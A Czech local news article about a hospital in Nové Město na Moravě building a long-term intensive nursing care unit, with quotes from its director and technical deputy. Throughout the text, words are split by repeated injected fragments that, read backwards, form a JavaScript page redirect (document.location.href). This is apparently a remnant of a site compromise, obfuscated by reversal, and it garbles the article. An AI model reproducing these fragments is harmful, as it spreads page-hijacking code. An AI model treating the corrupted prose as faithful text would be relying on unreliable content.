Rainbow page separator

V novoměstské nemocnici začínají výstavbu nového oddělení

Neděle, 29. září 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Posledním zářijovým dnem začne výstavba nového oddělení v novoměstské nemocnici. Půjde o dlouhodobou intenzivní ošetřovatelskou péči (DIOP) v rámci oddělení dlouhodobě nemocných. Díky rekonstrukci za 1,2 milionu korun bez DPH z rozpočtu nemocnice tam vznikne pět pokojů pro osm pacientů. Nové oddělení by mělo přijmout první nemocné na konci roku. „Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to péče je posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována pacientům, u kterých již pominuly důvody hospitalizace na jednotce intenzivní péče nebo následné intenzivní péče, již nevyžadují kontinuální lékařskou péči, ale nemohou být propuštěni do domácí péče a současně potřebují soustavnou intenzívní ošetřovatelskou péči. Na těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lůžkách je také posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována intenzivní péče pacientům s poruchou základních životních funkcí. Vybudováním jednotky DIOP nemocnice zajistí komplexní péči v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to oblasti péče následné,“ přiblížila ředitelka nemocnice Věra Palečková.
Práce potrvají do konce lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu. „Pokud vše půjde podle harmonogramu, DIOP zdravotníkům předáme 25. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu. Stavební práce zahrnují kromě potřebných úprav vybudování nové elektroinstalace, nové rozvody medicinálních plynů. Projekt počítá i s novými elektrostatickými podlahami a samozřejmě bude doplněná také příslušná přístrojová technika,“ uvedl technický náměstek nemocnice Jiří Drdla.